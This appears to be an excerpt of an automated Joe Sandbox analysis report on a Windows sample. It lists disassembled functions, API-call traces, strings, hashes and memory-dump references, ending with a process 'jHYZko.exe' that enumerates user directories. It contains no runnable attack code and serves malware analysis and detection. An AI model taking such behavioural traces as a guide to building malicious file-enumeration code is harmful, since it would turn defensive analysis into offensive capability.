String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 8990f5a09a6e8c270ccda399b7bbdb55a68d7444d87b41005d011b1ab967d8bf
Instruction ID: b345a1d92cfceb384c5f4a60724b3c5d2245ff276b6f7044802ede9949fe743d
Opcode Fuzzy Hash: 8990f5a09a6e8c270ccda399b7bbdb55a68d7444d87b41005d011b1ab967d8bf
Instruction Fuzzy Hash: C111D2B29007096BC710EE5AD841BDAB7E8EF54320F54862AFD989B244FB74E944CF91

Function 010A2622 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(C66D7777,00000000,00000000,?), ref: 010A2685

Part of subcall function 010A8463: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,010A406B,?,00000000,-00000008), ref: 010A84C4

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 010A28D7
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 010A291D
GetLastError.KERNEL32 ref: 010A29C0

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c159a6606cfc049dedde4d99190b9ad700bb33f2eb07fd149fce49f9b57b328b
Instruction ID: c68166ec3964a4d6d2b99a594a64f9455d2537e9d02fca41e806b88461ef997e
Opcode Fuzzy Hash: c159a6606cfc049dedde4d99190b9ad700bb33f2eb07fd149fce49f9b57b328b
Instruction Fuzzy Hash: 48D188B5D002499FCB15CFE8C8809EDBBF4FF09314F58456AE9A6EB351D630A942CB60

Function 00FBA5B0 Relevance: 6.1, APIs: 4, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(B6BDACB9), ref: 00FBA619
GetProcAddress.KERNEL32(00000000,AF88AC99), ref: 00FBA624
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00FBA6A2
SetEvent.KERNEL32(00000000), ref: 00FBA6A9

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Event$AddressCreateHandleModuleProc
String ID:
API String ID: 2341598627-0
Opcode ID: b2691d9194626f7d2ff2c39107f1b10cae4779f9b92fd03eef493a0ea7be4452
Instruction ID: 443980afb3e54bce3f5219320f77f27a280a935ae4ed6b2edf3ce34de9359634
Opcode Fuzzy Hash: b2691d9194626f7d2ff2c39107f1b10cae4779f9b92fd03eef493a0ea7be4452
Instruction Fuzzy Hash: 8E31D47091438CEBEF10DFE4D849BEEBBB9EF15304F14005DE541AA241E7B65608CBA6

Function 0108B305 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,?,?,?,?,00000000,00000000,?,?,?,0101979F,00000000,?,?,00000000), ref: 0108B322
GetLastError.KERNEL32(?,0101979F,00000000,?,?,00000000,00000000,?,?), ref: 0108B32E
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,0101979F,00000000,?,?,00000000,00000000,?), ref: 0108B354
GetLastError.KERNEL32(?,0101979F,00000000,?,?,00000000,00000000,?,?), ref: 0108B360

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: ba5957ebe6b13e08a48a08f3a7f802e31283836cfa99dffdf727b90c1bea8812
Instruction ID: 6806204c8c2c288155df6b387b3634dc45d8a4e9b3122f902bb9468093d1841c
Opcode Fuzzy Hash: ba5957ebe6b13e08a48a08f3a7f802e31283836cfa99dffdf727b90c1bea8812
Instruction Fuzzy Hash: EF013132604159BBDF231E95DD48D9F3FAAFBDA790B008014FE8595225C632C822EBA0

Function 010B1C22 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,01096AF7,00000000,00000000,?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000), ref: 010B1C39
GetLastError.KERNEL32(?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000,?,?,?,010A2FEE,00000000), ref: 010B1C45

Part of subcall function 010B1C0B: CloseHandle.KERNEL32(FFFFFFFE,010B1C55,?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000,?,?), ref: 010B1C1B

___initconout.LIBCMT ref: 010B1C55

Part of subcall function 010B1BCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010B1BFC,010AE98C,?,?,010A2A14,?,00000000,00000000,?), ref: 010B1BE0

WriteConsoleW.KERNEL32(00000000,00000000,01096AF7,00000000,?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000,?), ref: 010B1C6A

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0dffd9b15fc99b7239426327fbc996a62a0077e8a8e2c30642215ceb3654ffb6
Instruction ID: 3f7d5f4df5bd9d4fba8dc48280b73bd95e99fed7c0e36da81e96227e19b7033c
Opcode Fuzzy Hash: 0dffd9b15fc99b7239426327fbc996a62a0077e8a8e2c30642215ceb3654ffb6
Instruction Fuzzy Hash: E1F03036400119BBCF325FD6EC48ECE3F66FB487A1B044050FA8D9A560C63388209BD0

Function 01022A60 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 01022F43

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 0a799b8f682b269648247401dede6cfee5b00a7a79b03691a242a866a75fd821
Instruction ID: 34071097d83f19ef7fefca1eed681cd8c9e120c8451dc39094b78d7efa20411a
Opcode Fuzzy Hash: 0a799b8f682b269648247401dede6cfee5b00a7a79b03691a242a866a75fd821
Instruction Fuzzy Hash: 9BE1C471A002199FCB19DFACC890AADBBF5FF58310B148369E899DB395D730E951CB90

Function 00FB8080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00FB844D

Strings

parse error, xrefs: 00FB8149, 00FB8162
ror, xrefs: 00FB80D4

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: aaa6ea8bb8ae413a97a91989cadbccf0e8283be240ab2b41d6fc50ee95cfa208
Instruction ID: bb307511d0b8b0d7b49e9448014ac5bf43969663d0fd8139890cfe5f808996fe
Opcode Fuzzy Hash: aaa6ea8bb8ae413a97a91989cadbccf0e8283be240ab2b41d6fc50ee95cfa208
Instruction Fuzzy Hash: 51C1F271900649CFEB08CF68CC84BEDBB75FF95304F248258E444AB696DB74AA85CF91

Function 00FB7DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00FB8051
___std_exception_destroy.LIBVCRUNTIME ref: 00FB8060

Strings

[json.exception., xrefs: 00FB7E1C

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: a556b89add89b31fe5a0a446d85f0dc3426c88e5ea6328dba71e23b6ba433f87
Instruction ID: db1cfaae98167c17550d512da2f9f3b400c66ce46e194d4a5811a7091419e423
Opcode Fuzzy Hash: a556b89add89b31fe5a0a446d85f0dc3426c88e5ea6328dba71e23b6ba433f87
Instruction Fuzzy Hash: 229126309002089FEB18EFA8CC85BEEFBB5FF95314F10425DE440AB691D7B4A984DB91

Function 00FB3A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00FB3C0F

Part of subcall function 0108E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0108B17A,?,010E09CC,00000000,?,00000000,-010E65B0), ref: 0108E9CB

Strings

ios_base::failbit set, xrefs: 00FB3AC8
ios_base::badbit set, xrefs: 00FB3BA7, 00FB3BD2, 00FB3BF3

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: d9183018e58094d64c5fb4ed989be8673b7f288bdc18e0e34c56ba99eae04924
Instruction ID: 8f0c91b016b5cd7a142b2d0be52f7b8e25d8178544583c5c2aa6ab3a97ac09f3
Opcode Fuzzy Hash: d9183018e58094d64c5fb4ed989be8673b7f288bdc18e0e34c56ba99eae04924
Instruction Fuzzy Hash: 4941F671D10608ABD704DF59CC85BEAF7B8EF55320F14822AF9949B641E774AA40CBA1

Function 00FB6330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 0108E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0108B17A,?,010E09CC,00000000,?,00000000,-010E65B0), ref: 0108E9CB

___std_fs_directory_iterator_open@12.LIBCPMT ref: 00FB644F
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00FB646A

Strings

exists, xrefs: 00FB6366

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID: exists
API String ID: 1297148070-2996790960
Opcode ID: 43bdbc97545bf99e333a976d28a140fc62c6e8cd50cbda5af20037955df51ad2
Instruction ID: 8cab03459a00a9a43c494b63066c17dfe87239eddbfaaa6d213787eecebc373f
Opcode Fuzzy Hash: 43bdbc97545bf99e333a976d28a140fc62c6e8cd50cbda5af20037955df51ad2
Instruction Fuzzy Hash: 6941CF72900604ABCB10DF5ACD81BEAB7B8FB44720F144269EC55A7780EB796914DAE1

Function 010245C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 01024E29
___std_exception_destroy.LIBVCRUNTIME ref: 01024E42
___std_exception_destroy.LIBVCRUNTIME ref: 0102594D
___std_exception_destroy.LIBVCRUNTIME ref: 01025966

Strings

value, xrefs: 01025873

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 9c10774b7708d90e92de8c2ae4455c54ad826659003efd8deb7432852168198f
Instruction ID: 4014e0befe24dcf12bd7a0494db4acc39da276fc0083b7ff80289c2beaf76fc9
Opcode Fuzzy Hash: 9c10774b7708d90e92de8c2ae4455c54ad826659003efd8deb7432852168198f
Instruction Fuzzy Hash: 0C51DEB0D04258DBEB14DFA4CC88BDEBBB4BF15304F144259E485AB381DB746A88CB55

Function 010299A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 010299F1

Strings

type must be boolean, but is , xrefs: 01029AE2
type must be string, but is , xrefs: 01029A58

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 45c2d4a2654ffa04de8f4a8494abe9257a75177a40075bc2316a69c2f850b96a
Instruction ID: a4d538f485a74df1cb8f9229f668525e7dbe731a848a5a660e632d5f3b75db3b
Opcode Fuzzy Hash: 45c2d4a2654ffa04de8f4a8494abe9257a75177a40075bc2316a69c2f850b96a
Instruction Fuzzy Hash: D93190B1900248AFDB04FBA8DC51BDEB7B9EB14314F1002A9F495D7785EF38AA04C792

Analysis Process: jHYZko.exePID: 6484, Parent PID: 4912COMMON

Execution Graph

Execution Coverage:	31.8%
Dynamic/Decrypted Code Coverage:	8.9%
Signature Coverage:	12.3%
Total number of Nodes:	292
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00E629E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E62A02
wsprintfA.USER32 ref: 00E62A1A
memset.MSVCRT ref: 00E62A44
lstrlen.KERNEL32(?), ref: 00E62A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00E62A6C
strrchr.MSVCRT ref: 00E62A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00E62A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00E62AAE
memset.MSVCRT ref: 00E62AC6
memset.MSVCRT ref: 00E62ADA
FindFirstFileA.KERNEL32(?,?), ref: 00E62AEF
memset.MSVCRT ref: 00E62B13
lstrcmpiA.KERNEL32(?,?), ref: 00E62B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00E62B67
FindClose.KERNEL32(00000000), ref: 00E62B6E

Strings

%s*, xrefs: 00E62A14
Documents and Settings, xrefs: 00E62A8D, 00E62A92, 00E62A9A, 00E62AAD
C:\, xrefs: 00E62A2F

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 59923ebc7275c748c8ddc141bbb2e7f5817ad9e8a5fd326a57a8391541ba23ab
Instruction ID: 84181f78adf8ea2ebd3bcdabb89cd3354b7dde3c03c5ecfcc25e2819bdb6f94a
Opcode Fuzzy Hash: 59923ebc7275c748c8ddc141bbb2e7f5817ad9e8a5fd326a57a8391541ba23ab
Instruction Fuzzy Hash: 9C4172B2844749AFD720DBA0FC49DEBB7ECEB84395F04082DF644E2051E675D64C87A2

Function 00E61718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61729
